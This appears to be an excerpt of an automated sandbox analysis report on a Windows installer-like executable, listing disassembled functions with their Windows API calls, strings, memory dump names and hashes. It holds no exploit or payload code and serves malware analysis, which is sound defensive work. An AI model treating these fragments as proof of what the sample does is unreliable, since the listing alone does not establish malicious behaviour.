                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD0050 Relevance: 12.1, APIs: 8, Instructions: 138COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00BD007A
                                                                                                                                                                        • GetWindow.USER32(?,00000005), ref: 00BD0087
                                                                                                                                                                        • GetWindow.USER32(00000000,00000002), ref: 00BD01C2
                                                                                                                                                                          • Part of subcall function 00BCFED0: GetWindowRect.USER32(?,?), ref: 00BCFEFC
                                                                                                                                                                          • Part of subcall function 00BCFED0: GetWindowRect.USER32(?,?), ref: 00BCFF0C
                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00BD011B
                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00BD012B
                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00BD0145
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$Rect
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3200805268-0
                                                                                                                                                                        • Opcode ID: 2f60d506065339d56b1f145e8b21a5f28e7dfd3fc6fd79950bad6a297e2021ab
                                                                                                                                                                        • Instruction ID: 80049c46610233a126cba94040044d75f8f41f4c1975b7c44fb507ada457f250
                                                                                                                                                                        • Opcode Fuzzy Hash: 2f60d506065339d56b1f145e8b21a5f28e7dfd3fc6fd79950bad6a297e2021ab
                                                                                                                                                                        • Instruction Fuzzy Hash: EC418D315147019FC321EF29C980A6BF7EAFF96704F544A5EF085A7661EB30E988CB52
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D7F8B1 Relevance: 12.1, APIs: 8, Instructions: 73memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,00D7FA5B,?,?,?,?,?,?,?), ref: 00D7F8D5
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00D7FA5B,?,?,?,?,?,?,?), ref: 00D7F8DC
                                                                                                                                                                          • Part of subcall function 00D7F9A7: IsProcessorFeaturePresent.KERNEL32(0000000C,00D7F8C3,00000000,?,00D7FA5B,?,?,?,?,?,?,?), ref: 00D7F9A9
                                                                                                                                                                        • InterlockedPopEntrySList.KERNEL32(00000000,00000000,?,00D7FA5B,?,?,?,?,?,?,?), ref: 00D7F8EC
                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00D7FA5B,?,?,?,?,?,?,?), ref: 00D7F913
                                                                                                                                                                        • RaiseException.KERNEL32(C0000017,00000000,00000000,00000000,?,00D7FA5B,?,?,?,?,?,?,?), ref: 00D7F927
                                                                                                                                                                        • InterlockedPopEntrySList.KERNEL32(00000000,?,00D7FA5B,?,?,?,?,?,?,?), ref: 00D7F93A
                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00D7FA5B,?,?,?,?,?,?,?), ref: 00D7F94D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocEntryHeapInterlockedListVirtual$ExceptionFeatureFreePresentProcessProcessorRaise
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2460949444-0
                                                                                                                                                                        • Opcode ID: f49f88e6768d0ab5c6f0c88ff9b43ec59332be7a0593fc720f1057d525876d5d
                                                                                                                                                                        • Instruction ID: 2ea9780efe5a57819051fc7118235fb0bb31a59fb66211a8707a80ff61e9fae1
                                                                                                                                                                        • Opcode Fuzzy Hash: f49f88e6768d0ab5c6f0c88ff9b43ec59332be7a0593fc720f1057d525876d5d
                                                                                                                                                                        • Instruction Fuzzy Hash: 9311BFB1605A11BFE6321779AD49F3E6658EF44784F148532FBC9F6260EB61CC488AB0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00C7E520 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 342COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00C7E7C5
                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00C7E891
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Init_thread_footer
                                                                                                                                                                        • String ID: AI_FRAME_NO_CAPTION_$Dialog$Pu$`Dialog` = '
                                                                                                                                                                        • API String ID: 1385522511-2988394120
                                                                                                                                                                        • Opcode ID: 4791ae00654cd30e295fac1d674411fc75f3d1321dd18d56be7137f98b776f93
                                                                                                                                                                        • Instruction ID: bf558767bc73b88d8ae92f51f7926e582195414d1d9154fd9eafcb66484b6f41
                                                                                                                                                                        • Opcode Fuzzy Hash: 4791ae00654cd30e295fac1d674411fc75f3d1321dd18d56be7137f98b776f93
                                                                                                                                                                        • Instruction Fuzzy Hash: 67D1CF72A01208DFCB14CF79DD85B9EBBB5EF88310F14826AE515BB391D770A948CB51
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D01450 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 319synchronizationfileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00BBAB90: GetProcessHeap.KERNEL32 ref: 00BBABE5
                                                                                                                                                                          • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBAC17
                                                                                                                                                                          • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBACA2
                                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,00000000,?,?,?,?), ref: 00D0175A
                                                                                                                                                                          • Part of subcall function 00BBA140: FindResourceW.KERNEL32(00000000,?,00000006,00000000,00000000,00000000,00BBA2B8,-00000010,?,00000000), ref: 00BBA163
                                                                                                                                                                          • Part of subcall function 00BBA850: HeapAlloc.KERNEL32(?,00000000,?,1FC3D414,00000000,00DA7F70,000000FF,?,?,00E8EFDC,?,00D119F5,8000000B), ref: 00BBA89A
                                                                                                                                                                        • ResetEvent.KERNEL32(00000000,1FC3D414,?,?,00000000,00DF22FD,000000FF,?,80004005), ref: 00D017EF
                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00DF22FD,000000FF,?,80004005), ref: 00D0180F
                                                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000,00DF22FD,000000FF,?,80004005), ref: 00D0181A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HeapInit_thread_footerObjectSingleWait$AllocDeleteEventFileFindProcessResetResource
                                                                                                                                                                        • String ID: TEST$tin9999.tmp
                                                                                                                                                                        • API String ID: 639690705-3424081289
                                                                                                                                                                        • Opcode ID: b2f6d0a1b12263aee54a8856074f252dd2c969d80e1afb15939cd11f646ae731
                                                                                                                                                                        • Instruction ID: e6559535274c5fc96dc232cd041381e5ae42ef7e7bdcc58f2955768e40f41a4c
                                                                                                                                                                        • Opcode Fuzzy Hash: b2f6d0a1b12263aee54a8856074f252dd2c969d80e1afb15939cd11f646ae731
                                                                                                                                                                        • Instruction Fuzzy Hash: 6CC1E175901259EFDB14DF68CC05BAEB7B8FF45310F1482A9E81AA72D1DB709E04CBA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BCD310 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 285registryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000000,Caphyon.AI.ExtUI.IEClickSoundRemover,1FC3D414), ref: 00BCD3B1
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00BCD3DA
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,00E1329C,00000000,00E1329C,00000000,?,80000001,00000001,00000000,AppEvents\Schemes\Apps\Explorer\Navigating\.Current,00000033), ref: 00BCD64E
                                                                                                                                                                        • CloseHandle.KERNEL32(?,1FC3D414,?,?,00000000,00DAC7CD,000000FF,?,00E1329C,00000000,00E1329C,00000000,?,80000001,00000001,00000000), ref: 00BCD6DE
                                                                                                                                                                        Strings
                                                                                                                                                                        • AppEvents\Schemes\Apps\Explorer\Navigating\.Current, xrefs: 00BCD412
                                                                                                                                                                        • Caphyon.AI.ExtUI.IEClickSoundRemover, xrefs: 00BCD3A6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Close$CreateErrorEventHandleLast
                                                                                                                                                                        • String ID: AppEvents\Schemes\Apps\Explorer\Navigating\.Current$Caphyon.AI.ExtUI.IEClickSoundRemover
                                                                                                                                                                        • API String ID: 1253123496-2079760225
                                                                                                                                                                        • Opcode ID: eb3b4dafb4141e8199f3734241abc6d981cafec5754703cb81941a0b1b0fdb78
                                                                                                                                                                        • Instruction ID: d7b1cd2566fd80f6576b94ce7fced27b5e1976a4d85e7a682f7ecc67edf71a29
                                                                                                                                                                        • Opcode Fuzzy Hash: eb3b4dafb4141e8199f3734241abc6d981cafec5754703cb81941a0b1b0fdb78
                                                                                                                                                                        • Instruction Fuzzy Hash: 94C1AD70D00248DFDB14CF68CD45BAEBBF5EF55304F1082ADE459A7281DB74AA88CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BC0720 Relevance: 10.7, APIs: 7, Instructions: 204memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 00BC0814
                                                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 00BC0889
                                                                                                                                                                        • GetProcessHeap.KERNEL32(?,?), ref: 00BC08F9
                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?), ref: 00BC08FF
                                                                                                                                                                        • GetProcessHeap.KERNEL32(?,00000000,?,00000000,00000000,00000000,1FC3D414,00E2ADDC,00000000), ref: 00BC092C
                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000,1FC3D414,00E2ADDC,00000000), ref: 00BC0932
                                                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 00BC094A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Free$Heap$String$Process
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2680101141-0
                                                                                                                                                                        • Opcode ID: db4a1333d2ae6c1f70f971cd92a8fc1f244bc91948a97dd410e49bfc9ea12009
                                                                                                                                                                        • Instruction ID: 339c31adf50b6e2097d32afc94fb5bd8ddd998616a0dc8ecc0d71d98c5b3d6ff
                                                                                                                                                                        • Opcode Fuzzy Hash: db4a1333d2ae6c1f70f971cd92a8fc1f244bc91948a97dd410e49bfc9ea12009
                                                                                                                                                                        • Instruction Fuzzy Hash: 9C811A7091021ADFEF11EFA8C845BAEBBF4FF05314F1445A9E454A7281D7B8AA04CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CD6E80 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryW.KERNEL32(Shlwapi.dll,?,?,?,?,00CE2271,?,1FC3D414,?,?), ref: 00CD6E9B
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 00CD6EB1
                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00CD6EEA
                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,00CE2271,?,1FC3D414,?,?), ref: 00CD6F06
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Library$Free$AddressLoadProc
                                                                                                                                                                        • String ID: DllGetVersion$Shlwapi.dll
                                                                                                                                                                        • API String ID: 1386263645-2240825258
                                                                                                                                                                        • Opcode ID: 078fe49d0cddb6b29892fe478e2795c9d5516e66d38c999f5e49d34e823d5182
                                                                                                                                                                        • Instruction ID: 5c5f6b971848404e62a25f7af7f22e2822fdb115210cb74ba0658360d4fd44b7
                                                                                                                                                                        • Opcode Fuzzy Hash: 078fe49d0cddb6b29892fe478e2795c9d5516e66d38c999f5e49d34e823d5182
                                                                                                                                                                        • Instruction Fuzzy Hash: 1D21D1726047058BD310AF29E841A6BB7E4FFDD701B80092EF589D3201EB36D94DC7A2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D999E2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00D99AEF,00D95FF3,0000000C,?,00000000,00000000,?,00D99D59,00000021,FlsSetValue,00E0CE7C,00E0CE84,?), ref: 00D99AA3
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                                        • String ID: api-ms-$ext-ms-
                                                                                                                                                                        • API String ID: 3664257935-537541572
                                                                                                                                                                        • Opcode ID: 6162c625f1b7995b270d33eefdd23190b12421fb6e97ad3a4805692fba75e7e1
                                                                                                                                                                        • Instruction ID: 845c336b7f691cafb991af84dda0820a996d6e62b054f38f509da7b9fa8ffebc
                                                                                                                                                                        • Opcode Fuzzy Hash: 6162c625f1b7995b270d33eefdd23190b12421fb6e97ad3a4805692fba75e7e1
                                                                                                                                                                        • Instruction Fuzzy Hash: D0213A31A01211AFDF219B6ADD60A5BB759EB417B0F380229E846F72E1DB30ED44C6F0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D7D1CE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00D7D249,00D7D1AC,00D7D44D), ref: 00D7D1E5
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00D7D1FB
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00D7D210
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                                                                        • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                                                                        • API String ID: 667068680-1718035505
                                                                                                                                                                        • Opcode ID: 104a8605176785ded6ae580e36f7762ccf646156ea4ac908d45797372d30c010
                                                                                                                                                                        • Instruction ID: a9c18ce6fc97c2e88d5012232440f028eed940897424832c39bd7355f78c5dbc
                                                                                                                                                                        • Opcode Fuzzy Hash: 104a8605176785ded6ae580e36f7762ccf646156ea4ac908d45797372d30c010
                                                                                                                                                                        • Instruction Fuzzy Hash: 94F0AF313523229F9B315F665D9566732EAAF0635031C903AE9C9F6281FE20CC8A97B4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BE6970 Relevance: 9.2, APIs: 6, Instructions: 178windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SendMessageW.USER32(?,00000318,00000000,00000004), ref: 00BE69D7
                                                                                                                                                                        • SendMessageW.USER32(?,00001304,00000000,00000000), ref: 00BE69FF
                                                                                                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00BE6A17
                                                                                                                                                                        • SendMessageW.USER32(?,0000130A,00000000,?), ref: 00BE6A48
                                                                                                                                                                        • GetParent.USER32(?), ref: 00BE6B24
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000136,?,?), ref: 00BE6B35
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend$Parent
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1020955656-0
                                                                                                                                                                        • Opcode ID: f1351a788ab9b5e289228632e734ea1d3d28eb46a3a37a03631bbbbb770b2e48
                                                                                                                                                                        • Instruction ID: 58d7b8f67bbeeed2757df68b03350e988cb12b6187310631e6a28751db83cc4f
                                                                                                                                                                        • Opcode Fuzzy Hash: f1351a788ab9b5e289228632e734ea1d3d28eb46a3a37a03631bbbbb770b2e48
                                                                                                                                                                        • Instruction Fuzzy Hash: 15613872924218AFDB219FE5CC49FAEBBB9FF48711F10411AF615BB2A0C7706949CB50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D11120 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 244fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _wcsrchr.LIBVCRUNTIME ref: 00D11154
                                                                                                                                                                          • Part of subcall function 00BBAB90: GetProcessHeap.KERNEL32 ref: 00BBABE5
                                                                                                                                                                          • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBAC17
                                                                                                                                                                          • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBACA2
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00D111FA
                                                                                                                                                                        • _wcsrchr.LIBVCRUNTIME ref: 00D11269
                                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?), ref: 00D1132F
                                                                                                                                                                          • Part of subcall function 00CD0270: LoadStringW.USER32(000000A1,?,00000514,1FC3D414), ref: 00CD01D6
                                                                                                                                                                        Strings
                                                                                                                                                                        • --verbose --log-file="%s" --remove-pack-file "%s" "%s", xrefs: 00D111AE
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
